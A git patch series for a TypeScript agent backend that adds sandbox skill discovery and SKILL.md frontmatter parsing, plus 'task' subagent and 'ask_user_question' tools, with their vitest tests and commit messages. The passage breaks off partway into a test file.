"recoup-api", + description: "Recoupable API skill", + path: "/home/vercel-sandbox/.agents/skills/recoup-api", + filename: "SKILL.md", + options: {}, +}; + +describe("getSkills", () => { + it("returns the skills array when present in a valid AgentContext", () => { + expect(getSkills({ ...validCtx, skills: [sample] })).toEqual([sample]); + }); + + it("returns [] when no skills field is set", () => { + expect(getSkills(validCtx)).toEqual([]); + }); + + it("returns [] for malformed contexts (non-AgentContext shape)", () => { + expect(getSkills(undefined)).toEqual([]); + expect(getSkills(null)).toEqual([]); + expect(getSkills({ noSandbox: true })).toEqual([]); + expect(getSkills({ sandbox: null })).toEqual([]); + }); +}); diff --git a/lib/skills/__tests__/injectSkillDirectory.test.ts b/lib/skills/__tests__/injectSkillDirectory.test.ts new file mode 100644 index 000000000..ac6d646bb --- /dev/null +++ b/lib/skills/__tests__/injectSkillDirectory.test.ts @@ -0,0 +1,14 @@ +import { describe, it, expect } from "vitest"; +import { injectSkillDirectory } from "@/lib/skills/injectSkillDirectory"; + +describe("injectSkillDirectory", () => { + it("prepends a `Skill directory: ` header followed by a blank line", () => { + expect(injectSkillDirectory("body content", "/skills/foo")).toBe( + "Skill directory: /skills/foo\n\nbody content", + ); + }); + + it("works with empty body", () => { + expect(injectSkillDirectory("", "/skills/foo")).toBe("Skill directory: /skills/foo\n\n"); + }); +}); diff --git a/lib/skills/__tests__/parseSkillFrontmatter.test.ts b/lib/skills/__tests__/parseSkillFrontmatter.test.ts new file mode 100644 index 000000000..91dfcf7c1 --- /dev/null +++ b/lib/skills/__tests__/parseSkillFrontmatter.test.ts @@ -0,0 +1,56 @@ +import { describe, it, expect } from "vitest"; +import { parseSkillFrontmatter } from "@/lib/skills/parseSkillFrontmatter"; + +describe("parseSkillFrontmatter", () => { + it("parses a minimal frontmatter (name + description)", () => { + const md = `---\nname: commit\ndescription: Make a git commit\n---\n\nBody.`; + const result = parseSkillFrontmatter(md); + expect(result.success).toBe(true); + if (!result.success) return; + expect(result.data.name).toBe("commit"); + expect(result.data.description).toBe("Make a git commit"); + }); + + it("unwraps double-quoted values (including escaped quotes)", () => { + const md = `---\nname: foo\ndescription: "Has \\"quotes\\" inside"\n---\nbody`; + const result = parseSkillFrontmatter(md); + expect(result.success).toBe(true); + if (!result.success) return; + expect(result.data.description).toBe('Has "quotes" inside'); + }); + + it("parses booleans for unquoted true/false", () => { + const md = `---\nname: foo\ndescription: bar\ndisable-model-invocation: true\nuser-invocable: false\n---\nbody`; + const result = parseSkillFrontmatter(md); + expect(result.success).toBe(true); + if (!result.success) return; + expect(result.data["disable-model-invocation"]).toBe(true); + expect(result.data["user-invocable"]).toBe(false); + }); + + it("treats `true`/`false` inside quotes as strings (not booleans)", () => { + const md = `---\nname: foo\ndescription: "true"\n---\nbody`; + const result = parseSkillFrontmatter(md); + expect(result.success).toBe(true); + if (!result.success) return; + expect(result.data.description).toBe("true"); + }); + + it("returns success:false when frontmatter is missing", () => { + const result = parseSkillFrontmatter("just markdown, no frontmatter"); + expect(result.success).toBe(false); + }); + + it("returns success:false when required fields are absent", () => { + const result = parseSkillFrontmatter(`---\nname: only-name\n---\nbody`); + expect(result.success).toBe(false); + }); + + it("preserves colons in values (e.g. URLs)", () => { + const md = `---\nname: foo\ndescription: see https://example.com\n---\nbody`; + const result = parseSkillFrontmatter(md); + expect(result.success).toBe(true); + if (!result.success) return; + expect(result.data.description).toBe("see https://example.com"); + }); +}); diff --git a/lib/skills/__tests__/substituteArguments.test.ts b/lib/skills/__tests__/substituteArguments.test.ts new file mode 100644 index 000000000..db4fb0aa9 --- /dev/null +++ b/lib/skills/__tests__/substituteArguments.test.ts @@ -0,0 +1,22 @@ +import { describe, it, expect } from "vitest"; +import { substituteArguments } from "@/lib/skills/substituteArguments"; + +describe("substituteArguments", () => { + it("replaces $ARGUMENTS with the provided args", () => { + expect(substituteArguments("run with $ARGUMENTS", "--flag value")).toBe( + "run with --flag value", + ); + }); + + it("replaces all occurrences", () => { + expect(substituteArguments("$ARGUMENTS / $ARGUMENTS", "x")).toBe("x / x"); + }); + + it("substitutes empty string when args are undefined", () => { + expect(substituteArguments("run with $ARGUMENTS", undefined)).toBe("run with "); + }); + + it("leaves text unchanged when $ARGUMENTS is absent", () => { + expect(substituteArguments("no placeholder here", "ignored")).toBe("no placeholder here"); + }); +}); diff --git a/lib/skills/discoverSkills.ts b/lib/skills/discoverSkills.ts new file mode 100644 index 000000000..9ae0ced67 --- /dev/null +++ b/lib/skills/discoverSkills.ts @@ -0,0 +1,89 @@ +import * as path from "path"; +import type { Sandbox } from "@/lib/sandbox/interface"; +import { findSkillFile } from "@/lib/skills/findSkillFile"; +import { parseSkillFrontmatter } from "@/lib/skills/parseSkillFrontmatter"; +import { frontmatterToOptions, type SkillMetadata } from "@/lib/skills/skillTypes"; + +/** + * Built-in commands that skills cannot shadow. Skills with these names + * would be unreachable via slash command, so we drop them at discovery. + */ +const BUILTIN_COMMANDS = ["model", "resume", "new"]; + +/** + * Scan a list of directories for skills. Each directory is expected to + * contain one subdirectory per skill, with a SKILL.md (or skill.md) + * inside. Returns metadata for everything discoverable; silently skips + * non-directories, missing files, malformed frontmatter, and names that + * shadow built-in slash commands. + * + * Dedupes by name (case-insensitive); first-wins across directories so + * callers can list project skills before global skills and have project + * shadow global. + * + * @param sandbox - Connected sandbox for file ops. + * @param directories - Absolute paths to scan. + */ +export async function discoverSkills( + sandbox: Sandbox, + directories: string[], +): Promise { + const skills: SkillMetadata[] = []; + const seen = new Set(); + + for (const dir of directories) { + try { + const stat = await sandbox.stat(dir); + if (!stat.isDirectory()) continue; + } catch { + continue; // directory doesn't exist + } + + let entries; + try { + entries = await sandbox.readdir(dir, { withFileTypes: true }); + } catch { + continue; + } + + for (const entry of entries) { + if (!entry.isDirectory()) continue; + + const skillDir = path.join(dir, entry.name); + const skillFile = await findSkillFile(sandbox, skillDir); + if (!skillFile) continue; + + let content: string; + try { + content = await sandbox.readFile(skillFile, "utf-8"); + } catch { + continue; + } + + const parsed = parseSkillFrontmatter(content); + if (!parsed.success) continue; + const frontmatter = parsed.data; + + if (BUILTIN_COMMANDS.includes(frontmatter.name.toLowerCase())) { + console.warn( + `[discoverSkills] Skipping "${frontmatter.name}" in ${skillDir} — name shadows built-in /${frontmatter.name}`, + ); + continue; + } + + const normalized = frontmatter.name.toLowerCase(); + if (seen.has(normalized)) continue; + seen.add(normalized); + + skills.push({ + name: frontmatter.name, + description: frontmatter.description, + path: skillDir, + filename: path.basename(skillFile), + options: frontmatterToOptions(frontmatter), + }); + } + } + + return skills; +} diff --git a/lib/skills/extractSkillBody.ts b/lib/skills/extractSkillBody.ts new file mode 100644 index 000000000..d1dcb3f5e --- /dev/null +++ b/lib/skills/extractSkillBody.ts @@ -0,0 +1,14 @@ +/** + * Strip the YAML frontmatter from a SKILL.md file and return just the + * markdown body. Returns the entire content (trimmed) when no + * frontmatter is present. + * + * @param fileContent - Full file content read from sandbox. + */ +export function extractSkillBody(fileContent: string): string { + const match = fileContent.match(/^---\r?\n[\s\S]*?\r?\n---\r?\n?/); + if (match) { + return fileContent.slice(match[0].length).trim(); + } + return fileContent.trim(); +} diff --git a/lib/skills/findSkillFile.ts b/lib/skills/findSkillFile.ts new file mode 100644 index 000000000..a81b9e415 --- /dev/null +++ b/lib/skills/findSkillFile.ts @@ -0,0 +1,33 @@ +import * as path from "path"; +import type { Sandbox } from "@/lib/sandbox/interface"; + +/** + * Locate the SKILL.md file inside a candidate skill directory. Prefers + * uppercase `SKILL.md` (the project convention) but falls back to + * lowercase `skill.md` for skills that ship the lowercase name. Returns + * `null` when neither file exists so callers can skip the entry. + * + * Probes via `sandbox.access` (which throws on missing) rather than + * `readdir` so we don't pay the cost of listing a directory whose + * contents we don't otherwise need. + * + * @param sandbox - Connected sandbox handle. + * @param skillDir - Absolute path to the candidate skill directory. + */ +export async function findSkillFile(sandbox: Sandbox, skillDir: string): Promise { + const uppercase = path.join(skillDir, "SKILL.md"); + const lowercase = path.join(skillDir, "skill.md"); + + try { + await sandbox.access(uppercase); + return uppercase; + } catch { + // try lowercase + } + try { + await sandbox.access(lowercase); + return lowercase; + } catch { + return null; + } +} diff --git a/lib/skills/getGlobalSkillsDirectory.ts b/lib/skills/getGlobalSkillsDirectory.ts new file mode 100644 index 000000000..788a6dfc7 --- /dev/null +++ b/lib/skills/getGlobalSkillsDirectory.ts @@ -0,0 +1,14 @@ +import * as path from "path"; + +/** + * Resolve the absolute path to the global skills directory under a + * given `$HOME`. This is where `installSessionGlobalSkills` lays down + * skills at sandbox provisioning time via `npx skills add ... -g` + * (today: `recoup-api`, `artist-workspace`). + * + * @param homeDirectory - The sandbox's resolved $HOME (e.g. + * `/home/vercel-sandbox`, or `/root` on the open-agents base image). + */ +export function getGlobalSkillsDirectory(homeDirectory: string): string { + return path.posix.join(homeDirectory, ".agents", "skills"); +} diff --git a/lib/skills/getSandboxSkillDirectories.ts b/lib/skills/getSandboxSkillDirectories.ts new file mode 100644 index 000000000..81645ea46 --- /dev/null +++ b/lib/skills/getSandboxSkillDirectories.ts @@ -0,0 +1,16 @@ +import type { Sandbox } from "@/lib/sandbox/interface"; +import { resolveSandboxHomeDirectory } from "@/lib/sandbox/resolveSandboxHomeDirectory"; +import { getGlobalSkillsDirectory } from "@/lib/skills/getGlobalSkillsDirectory"; + +/** + * Resolve the directory list to scan when discovering skills for a + * sandbox. Currently just one path — `${HOME}/.agents/skills/` — + * because all skills are provisioned globally at sandbox startup via + * `installSessionGlobalSkills` rather than bundled into the cloned repo. + * + * @param sandbox - Connected sandbox handle. + */ +export async function getSandboxSkillDirectories(sandbox: Sandbox): Promise { + const homeDirectory = await resolveSandboxHomeDirectory(sandbox); + return [getGlobalSkillsDirectory(homeDirectory)]; +} diff --git a/lib/skills/getSkills.ts b/lib/skills/getSkills.ts new file mode 100644 index 000000000..d2d29ed7d --- /dev/null +++ b/lib/skills/getSkills.ts @@ -0,0 +1,22 @@ +import { isAgentContext } from "@/lib/agent/tools/isAgentContext"; +import type { SkillMetadata } from "@/lib/skills/skillTypes"; + +/** + * Read the discovered skill catalog out of the agent's + * `experimental_context`. The catalog is populated by the chat handler + * via `discoverSkills(sandbox, getSandboxSkillDirectories(sandbox))` + * before workflow start, then threaded through as + * `AgentContext.skills`. Returns `[]` when the context shape is wrong + * or no skills were discovered. + * + * Lives in its own file so consumers (the `skill` tool today, future + * skill-aware system prompts tomorrow) share one accessor instead of + * each reimplementing the context-cast. + * + * @param experimental_context - Opaque context object passed by AI SDK to tool execute. + */ +export function getSkills(experimental_context: unknown): SkillMetadata[] { + if (!isAgentContext(experimental_context)) return []; + const ctx = experimental_context as { skills?: SkillMetadata[] }; + return ctx.skills ?? []; +} diff --git a/lib/skills/injectSkillDirectory.ts b/lib/skills/injectSkillDirectory.ts new file mode 100644 index 000000000..cf4bf58d5 --- /dev/null +++ b/lib/skills/injectSkillDirectory.ts @@ -0,0 +1,11 @@ +/** + * Prepend a `Skill directory: ` header to a skill body + * so the model can construct full paths to scripts and resources living + * alongside SKILL.md (e.g. `${skillDir}/scripts/check.sh`). + * + * @param body - Skill body (after frontmatter strip). + * @param skillDir - Absolute sandbox path to the skill directory. + */ +export function injectSkillDirectory(body: string, skillDir: string): string { + return `Skill directory: ${skillDir}\n\n${body}`; +} diff --git a/lib/skills/parseSkillFrontmatter.ts b/lib/skills/parseSkillFrontmatter.ts new file mode 100644 index 000000000..3d2888d76 --- /dev/null +++ b/lib/skills/parseSkillFrontmatter.ts @@ -0,0 +1,52 @@ +import { skillFrontmatterSchema } from "@/lib/skills/skillTypes"; + +/** + * Parse YAML frontmatter from SKILL.md content. Returns the Zod + * `safeParse` shape so callers can branch cleanly on success. + * + * Intentionally a hand-rolled subset of YAML (one-line `key: value` + * with `"…"` / `'…'` quoting + unquoted `true`/`false`) so we don't + * pull a YAML dep just to read a 3-line block. + * + * @param content - Full SKILL.md content (including the leading `---`). + */ +export function parseSkillFrontmatter( + content: string, +): ReturnType { + const match = content.match(/^---\r?\n([\s\S]*?)\r?\n---/); + if (!match?.[1]) { + return { + success: false, + error: new Error("No frontmatter found") as never, + }; + } + + const yaml = match[1]; + const parsed: Record = {}; + + for (const line of yaml.split("\n")) { + const trimmed = line.trim(); + if (!trimmed || trimmed.startsWith("#")) continue; + + const colonIndex = trimmed.indexOf(":"); + if (colonIndex === -1) continue; + + const key = trimmed.slice(0, colonIndex).trim(); + // Only split on the first colon so values like URLs stay intact. + let value: string | boolean = trimmed.slice(colonIndex + 1).trim(); + + if (value.startsWith('"') && value.endsWith('"')) { + value = value.slice(1, -1).replace(/\\"/g, '"'); + } else if (value.startsWith("'") && value.endsWith("'")) { + value = value.slice(1, -1).replace(/\\'/g, "'"); + } else if (value === "true") { + value = true; + } else if (value === "false") { + value = false; + } + + parsed[key] = value; + } + + return skillFrontmatterSchema.safeParse(parsed); +} diff --git a/lib/skills/skillTypes.ts b/lib/skills/skillTypes.ts new file mode 100644 index 000000000..77fffd055 --- /dev/null +++ b/lib/skills/skillTypes.ts @@ -0,0 +1,76 @@ +import { z } from "zod"; + +/** + * Zod schema for skill frontmatter YAML validation. Defines the + * expected structure at the top of SKILL.md files. + */ +export const skillFrontmatterSchema = z.object({ + name: z.string().min(1, "Skill name cannot be empty").describe("Unique name of the skill"), + description: z + .string() + .min(1, "Skill description cannot be empty") + .describe("Short description for the agent"), + version: z.string().optional().describe("Skill version"), + "disable-model-invocation": z + .boolean() + .optional() + .describe("If true, the model cannot invoke this skill automatically"), + "user-invocable": z + .boolean() + .optional() + .describe("If false, users cannot invoke this skill via slash command"), + "allowed-tools": z + .string() + .optional() + .describe("Comma-separated list of allowed tools when skill is active"), + context: z.enum(["fork"]).optional().describe("Execution context for the skill"), + agent: z.string().optional().describe("Agent type to use for execution"), +}); + +export type SkillFrontmatter = z.infer; + +/** + * Normalized skill options derived from frontmatter — camelCase fields, + * comma-separated lists pre-split. + */ +export interface SkillOptions { + disableModelInvocation?: boolean; + userInvocable?: boolean; + allowedTools?: string[]; + context?: "fork"; + agent?: string; +} + +/** + * Skill metadata stored on `AgentContext.skills`. Contains only what + * `skillTool` needs at invocation time — the SKILL.md body is loaded + * lazily. + */ +export interface SkillMetadata { + /** Unique name of the skill. */ + name: string; + /** Short description for the agent. */ + description: string; + /** Absolute sandbox path to the skill directory. */ + path: string; + /** Filename of the skill file (`SKILL.md` or `skill.md`). */ + filename: string; + /** Skill options from frontmatter. */ + options: SkillOptions; +} + +/** + * Normalize parsed frontmatter to {@link SkillOptions}. + */ +export function frontmatterToOptions(frontmatter: SkillFrontmatter): SkillOptions { + return { + disableModelInvocation: frontmatter["disable-model-invocation"], + userInvocable: frontmatter["user-invocable"], + allowedTools: frontmatter["allowed-tools"] + ?.split(",") + .map(t => t.trim()) + .filter(Boolean), + context: frontmatter.context, + agent: frontmatter.agent, + }; +} diff --git a/lib/skills/substituteArguments.ts b/lib/skills/substituteArguments.ts new file mode 100644 index 000000000..44500bc58 --- /dev/null +++ b/lib/skills/substituteArguments.ts @@ -0,0 +1,14 @@ +/** + * Replace all occurrences of `$ARGUMENTS` in a skill body with the + * provided args string (or empty string when no args were passed). + * + * Used by `skillTool` after loading SKILL.md so slash-command-style + * invocations like `/commit -m "fix"` thread the arg suffix through to + * the skill's body text. + * + * @param body - Skill body (markdown after frontmatter). + * @param args - Optional arguments passed by the model. + */ +export function substituteArguments(body: string, args?: string): string { + return body.replace(/\$ARGUMENTS/g, args ?? ""); +} From b36aa5846115cc30f18bc317aba2fca34fa431b5 Mon Sep 17 00:00:00 2001 From: "sweetman.eth" Date: Thu, 21 May 2026 17:45:47 -0500 Subject: [PATCH 06/10] feat(chat-workflow): port task + ask_user_question composite tools (PR 7) (#589) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * feat(chat-workflow): port task + ask_user_question composite tools (PR 7) Completes the open-agents tool surface. The agent now has all 11 tools. **ask_user_question** (lib/agent/tools/askUserQuestionTool.ts) — client-side tool with NO server execute. Schema mirrors open-agents verbatim (questions array, options with label/description, multiSelect flag, max 12-char header). streamText halts after emitting the tool- call because there's no result to feed back; the chat UI renders the question component, collects answers, and submits them in the next workflow request's messages array. No WDK pause/resume hook needed. **task** (lib/agent/tools/taskTool.ts) — slim port of open-agents' multi-type SUBAGENT_REGISTRY → one generic subagent. Runs a sub- `streamText` loop with a curated subagent tool set (`read, write, edit, grep, glob, bash`) matching open-agents' `executor` subagent. The subagent tool set deliberately EXCLUDES: - task (recursion guard — open-agents' three subagent types executor/explorer/design all explicitly omit task too; subagents are leaves of the agent tree) - ask_user_question, skill, todo_write, web_fetch (parity with open-agents subagent curation; subagents run autonomously, don't plan from scratch, don't make web calls, don't load further skills) AgentContext gains `modelId?: string` so the subagent can use the same model as its parent. Handler populates it from chat.model_id or the platform default. buildAgentTools registers both new tools unconditionally (skill stays conditional on a non-empty catalog). Quirk: api's AI SDK (6.0.0-beta.122) calls toModelOutput(output) directly, NOT toModelOutput({ output }) as open-agents' newer 6.0.165 does. askUserQuestionTool uses the direct signature. Tests: 9 askUserQuestionTool + 6 taskTool + updated buildAgentTools + AgentContext updates. Full suite 3075/3075 pass, lint clean, production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) * fix(task-tool): provide non-empty subagent prompt The subagent's streamText was invoked with messages: [] and only a system prompt, so the AI SDK recorded zero steps and threw NoOutputGeneratedError — surfaced to the parent as "Subagent failed: No output generated. Check the stream for errors." Pass an explicit user-side trigger prompt, mirroring open-agents' task tool. Adds a regression test that asserts streamText receives either a non-empty prompt or non-empty messages. Co-Authored-By: Claude Opus 4.7 (1M context) * refactor(task-tool): extract buildSubagentTools (SRP) + drop modelId from AgentContext (KISS) Address PR review feedback: - SRP: move buildSubagentTools to lib/agent/tools/buildSubagentTools.ts (one exported function per file). - KISS: open-agents' AgentContext type does not have modelId — it uses model: LanguageModel / subagentModel?: LanguageModel. api can't follow that exact shape because agentContext is part of a durable Vercel Workflow input and LanguageModel objects aren't JSON-serializable. Instead of inventing modelId on AgentContext, hardcode a default subagent model id in taskTool. A subagentModelId override field can be added if/when a real consumer needs it. Also format-fixes askUserQuestionTool.ts toModelOutput arrow (parentheses around single param flagged by prettier in CI). Co-Authored-By: Claude Opus 4.7 (1M context) * refactor(agent): align AgentContext + model resolution with open-agents Match open-agents' `tools/utils.ts` + `types.ts` shape so the subagent inherits the parent's model (rather than the previous hardcoded SUBAGENT_MODEL_ID): - AgentContext gains `model: LanguageModel` (required) and `subagentModel?: LanguageModel`, mirroring open-agents. - Introduce DurableAgentContext = Omit for the workflow input shape, since LanguageModel instances aren't JSON-serializable and can't ride durable Vercel Workflow inputs. - runAgentStep constructs `callModel = gateway(input.modelId)` once per step and merges it into experimental_context — same pattern as open-agents' prepareCall in open-harness-agent.ts. - New getMainModel / getSubagentModel helpers (SRP, one per file) mirror open-agents' utility functions: getSubagentModel returns `ctx.subagentModel ?? ctx.model`. - taskTool drops the hardcoded SUBAGENT_MODEL_ID; calls getSubagentModel(experimental_context, "task") instead — subagent now defaults to the same model the parent is running. Co-Authored-By: Claude Opus 4.7 (1M context) --------- Co-authored-by: Claude Opus 4.7 (1M context) --- app/lib/workflows/runAgentStep.ts | 25 ++- app/lib/workflows/runAgentWorkflow.ts | 9 +- lib/agent/__tests__/buildAgentTools.test.ts | 26 ++-- lib/agent/buildAgentTools.ts | 27 +++- lib/agent/tools/AgentContext.ts | 35 ++++- .../__tests__/askUserQuestionTool.test.ts | 111 +++++++++++++ lib/agent/tools/__tests__/taskTool.test.ts | 146 ++++++++++++++++++ lib/agent/tools/askUserQuestionTool.ts | 90 +++++++++++ lib/agent/tools/buildSubagentTools.ts | 32 ++++ lib/agent/tools/getMainModel.ts | 26 ++++ lib/agent/tools/getSubagentModel.ts | 24 +++ lib/agent/tools/taskTool.ts | 122 +++++++++++++++ 12 files changed, 644 insertions(+), 29 deletions(-) create mode 100644 lib/agent/tools/__tests__/askUserQuestionTool.test.ts create mode 100644 lib/agent/tools/__tests__/taskTool.test.ts create mode 100644 lib/agent/tools/askUserQuestionTool.ts create mode 100644 lib/agent/tools/buildSubagentTools.ts create mode 100644 lib/agent/tools/getMainModel.ts create mode 100644 lib/agent/tools/getSubagentModel.ts create mode 100644 lib/agent/tools/taskTool.ts diff --git a/app/lib/workflows/runAgentStep.ts b/app/lib/workflows/runAgentStep.ts index 704035c64..b487285dc 100644 --- a/app/lib/workflows/runAgentStep.ts +++ b/app/lib/workflows/runAgentStep.ts @@ -3,17 +3,21 @@ import { gateway } from "@ai-sdk/gateway"; import { agentCustomInstructions } from "@/lib/chat/agentCustomInstructions"; import { CHAT_AGENT_STOP_WHEN } from "@/lib/chat/const"; import { buildAgentTools } from "@/lib/agent/buildAgentTools"; -import type { AgentContext } from "@/lib/agent/tools/AgentContext"; +import type { AgentContext, DurableAgentContext } from "@/lib/agent/tools/AgentContext"; export type RunAgentStepInput = { messages: UIMessage[]; modelId: string; writable: WritableStream; /** - * Threaded into `streamText`'s `experimental_context` so each tool's - * `execute` callback can read the sandbox state + per-prompt context. + * The JSON-serializable agent context that survives the durable + * workflow input. `runAgentStep` widens it into a full `AgentContext` + * by attaching `model` (and optionally `subagentModel`) before + * threading into `streamText`'s `experimental_context`. Mirrors + * open-agents' prepareCall pattern, where the constructed callModel + * is added to `experimental_context` right before each model call. */ - agentContext: AgentContext; + agentContext: DurableAgentContext; }; /** @@ -43,13 +47,22 @@ export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishRe const modelMessages = convertToModelMessages(input.messages); const tools = buildAgentTools({ skills: input.agentContext.skills }); + // Construct the model here (not in the workflow input) — LanguageModel + // instances aren't JSON-serializable and can't ride durable inputs. + // Then attach to AgentContext so tools see the same model the parent + // is using, matching open-agents' `prepareCall` pattern. + const callModel = gateway(input.modelId); + const agentContext: AgentContext = { + ...input.agentContext, + model: callModel, + }; const result = streamText({ - model: gateway(input.modelId), + model: callModel, system: agentCustomInstructions, messages: modelMessages, tools, stopWhen: CHAT_AGENT_STOP_WHEN, - experimental_context: input.agentContext, + experimental_context: agentContext, }); // Acquire the writer once and release in `finally` so a thrown chunk diff --git a/app/lib/workflows/runAgentWorkflow.ts b/app/lib/workflows/runAgentWorkflow.ts index ce65b0bb3..3a0965342 100644 --- a/app/lib/workflows/runAgentWorkflow.ts +++ b/app/lib/workflows/runAgentWorkflow.ts @@ -1,7 +1,7 @@ import { getWritable } from "workflow"; import type { UIMessage, UIMessageChunk } from "ai"; import { runAgentStep } from "@/app/lib/workflows/runAgentStep"; -import type { AgentContext } from "@/lib/agent/tools/AgentContext"; +import type { DurableAgentContext } from "@/lib/agent/tools/AgentContext"; export type RunAgentWorkflowInput = { messages: UIMessage[]; @@ -9,10 +9,11 @@ export type RunAgentWorkflowInput = { sessionId: string; modelId: string; /** - * Threaded into `streamText`'s `experimental_context` so tools (bash et al.) - * can read sandbox state + per-prompt Recoup creds. + * JSON-serializable subset of AgentContext that survives the durable + * workflow input. `runAgentStep` attaches the constructed `model` + * before threading into `streamText`'s `experimental_context`. */ - agentContext: AgentContext; + agentContext: DurableAgentContext; }; /** diff --git a/lib/agent/__tests__/buildAgentTools.test.ts b/lib/agent/__tests__/buildAgentTools.test.ts index fb5d99a5a..e684818f2 100644 --- a/lib/agent/__tests__/buildAgentTools.test.ts +++ b/lib/agent/__tests__/buildAgentTools.test.ts @@ -1,7 +1,7 @@ import { describe, it, expect } from "vitest"; import { buildAgentTools } from "@/lib/agent/buildAgentTools"; -const BASE_TOOLS = [ +const ALWAYS_PRESENT = [ "bash", "read", "write", @@ -10,18 +10,20 @@ const BASE_TOOLS = [ "glob", "todo_write", "web_fetch", + "task", + "ask_user_question", ] as const; describe("buildAgentTools", () => { - it("returns the 8 leaf tools by default (no skill registered when skills list is empty)", () => { + it("registers the 10 always-on tools by default", () => { const tools = buildAgentTools(); - for (const name of BASE_TOOLS) { + for (const name of ALWAYS_PRESENT) { expect(tools).toHaveProperty(name); } expect(tools).not.toHaveProperty("skill"); }); - it("registers the skill tool when a non-empty skill catalog is provided", () => { + it("conditionally adds `skill` when a non-empty skill catalog is provided", () => { const tools = buildAgentTools({ skills: [ { @@ -34,17 +36,17 @@ describe("buildAgentTools", () => { ], }); expect(tools).toHaveProperty("skill"); - for (const name of BASE_TOOLS) { + for (const name of ALWAYS_PRESENT) { expect(tools).toHaveProperty(name); } }); - it("omits the skill tool when an empty array is passed", () => { + it("omits `skill` when an empty array is passed", () => { const tools = buildAgentTools({ skills: [] }); expect(tools).not.toHaveProperty("skill"); }); - it("each tool exposes the AI SDK shape (description + inputSchema + execute)", () => { + it("each tool exposes the AI SDK shape (description + inputSchema)", () => { const tools = buildAgentTools({ skills: [ { @@ -55,12 +57,16 @@ describe("buildAgentTools", () => { options: {}, }, ], - }) as Record; - for (const name of [...BASE_TOOLS, "skill"]) { + }) as Record; + for (const name of [...ALWAYS_PRESENT, "skill"]) { const t = tools[name]!; expect(typeof t.description).toBe("string"); expect(t.inputSchema).toBeDefined(); - expect(typeof t.execute).toBe("function"); } }); + + it("`ask_user_question` has no server execute (client-side tool)", () => { + const tools = buildAgentTools() as Record; + expect(tools.ask_user_question?.execute).toBeUndefined(); + }); }); diff --git a/lib/agent/buildAgentTools.ts b/lib/agent/buildAgentTools.ts index 393b32889..728334b11 100644 --- a/lib/agent/buildAgentTools.ts +++ b/lib/agent/buildAgentTools.ts @@ -1,3 +1,4 @@ +import { askUserQuestionTool } from "@/lib/agent/tools/askUserQuestionTool"; import { bashTool } from "@/lib/agent/tools/bashTool"; import { readFileTool } from "@/lib/agent/tools/readFileTool"; import { writeFileTool } from "@/lib/agent/tools/writeFileTool"; @@ -7,6 +8,7 @@ import { globTool } from "@/lib/agent/tools/globTool"; import { todoWriteTool } from "@/lib/agent/tools/todoWriteTool"; import { webFetchTool } from "@/lib/agent/tools/webFetchTool"; import { skillTool } from "@/lib/agent/tools/skillTool"; +import { taskTool } from "@/lib/agent/tools/taskTool"; import type { SkillMetadata } from "@/lib/skills/skillTypes"; /** @@ -14,13 +16,24 @@ import type { SkillMetadata } from "@/lib/skills/skillTypes"; * Each tool reads its sandbox handle + per-prompt context from * `experimental_context` at execute time — the factory is otherwise stateless. * - * Currently ships 9 tools: - * - 6 file/shell: bash, read, write, edit, grep, glob - * - todo_write (planning surface; stateless, echoes the list back) + * Currently ships 11 tools: + * + * Sandbox / file ops (6): + * - bash, read, write, edit, grep, glob + * + * Composite (2): + * - task — delegate focused work to a subagent (sub-streamText loop; + * subagent has only read/write/edit/grep/glob/bash to prevent + * recursion via task itself, matching open-agents' subagent + * curation) + * - skill — load a project-level skill's SKILL.md (only registered + * when the sandbox has skills available) + * + * Client-side / planning (3): + * - todo_write (stateless planning surface) * - web_fetch (HTTP via curl inside the sandbox) - * - skill (load a project-level skill's SKILL.md; only registered when the - * sandbox has skills available, so models without any skill catalog - * don't see the tool at all and never call it speculatively) + * - ask_user_question (no server execute; chat UI fulfills it and + * the next workflow turn sees the answer in messages) * * @param options.skills - Discovered skill catalog. When empty / undefined, * `skill` is omitted from the tool record so the model doesn't see it. @@ -36,6 +49,8 @@ export function buildAgentTools(options: { skills?: SkillMetadata[] } = {}) { glob: globTool, todo_write: todoWriteTool, web_fetch: webFetchTool, + task: taskTool, + ask_user_question: askUserQuestionTool, ...(hasSkills ? { skill: skillTool } : {}), }; } diff --git a/lib/agent/tools/AgentContext.ts b/lib/agent/tools/AgentContext.ts index acb455164..7cdcf24a4 100644 --- a/lib/agent/tools/AgentContext.ts +++ b/lib/agent/tools/AgentContext.ts @@ -1,11 +1,20 @@ +import type { LanguageModel } from "ai"; import type { VercelState } from "@/lib/sandbox/vercel/state"; import type { SkillMetadata } from "@/lib/skills/skillTypes"; /** * Per-tool-call context threaded into the agent via `streamText`'s - * `experimental_context`. Mirrors the open-agents `AgentContext` shape - * (subset — slim PR 4 ports only the `bash` tool, so context only needs - * what `bash` reads). + * `experimental_context`. Mirrors the open-agents `AgentContext` + * interface (`packages/agent/types.ts`) one-for-one. The only + * deviation is structural: `model` / `subagentModel` are + * `LanguageModel` instances that cannot ride through a durable + * Vercel Workflow input, so `runAgentStep` constructs them per-step + * (via `gateway(input.modelId)`) right before calling `streamText`. + * + * The durable workflow-input shape is `DurableAgentContext` below — + * `runAgentStep` widens that into a full `AgentContext` by attaching + * the constructed model(s) before `experimental_context` is observed + * by any tool. * * Why no `recoupAccessToken` field? A short-lived per-prompt credential * would let sandbox tools (`skill`, the eventual `recoup-api` skill) call @@ -42,4 +51,24 @@ export type AgentContext = { * Empty / undefined when the sandbox has no `skills/` directory. */ skills?: SkillMetadata[]; + /** + * Main agent's language model. Tools read this via `getMainModel`. + * Set per-step by `runAgentStep` (not part of the durable input). + * Mirrors open-agents' `AgentContext.model: LanguageModel`. + */ + model: LanguageModel; + /** + * Optional subagent override. If unset, `getSubagentModel` falls + * back to `model`. Mirrors open-agents' + * `AgentContext.subagentModel?: LanguageModel`. + */ + subagentModel?: LanguageModel; }; + +/** + * The JSON-serializable subset of `AgentContext` that survives a + * Vercel Workflow durable input (`start(runAgentWorkflow, [...])`). + * `LanguageModel` instances aren't serializable, so they're stripped + * here and re-attached inside the step. + */ +export type DurableAgentContext = Omit; diff --git a/lib/agent/tools/__tests__/askUserQuestionTool.test.ts b/lib/agent/tools/__tests__/askUserQuestionTool.test.ts new file mode 100644 index 000000000..ee55e6305 --- /dev/null +++ b/lib/agent/tools/__tests__/askUserQuestionTool.test.ts @@ -0,0 +1,111 @@ +import { describe, it, expect } from "vitest"; +import { + askUserQuestionTool, + askUserQuestionInputSchema, +} from "@/lib/agent/tools/askUserQuestionTool"; + 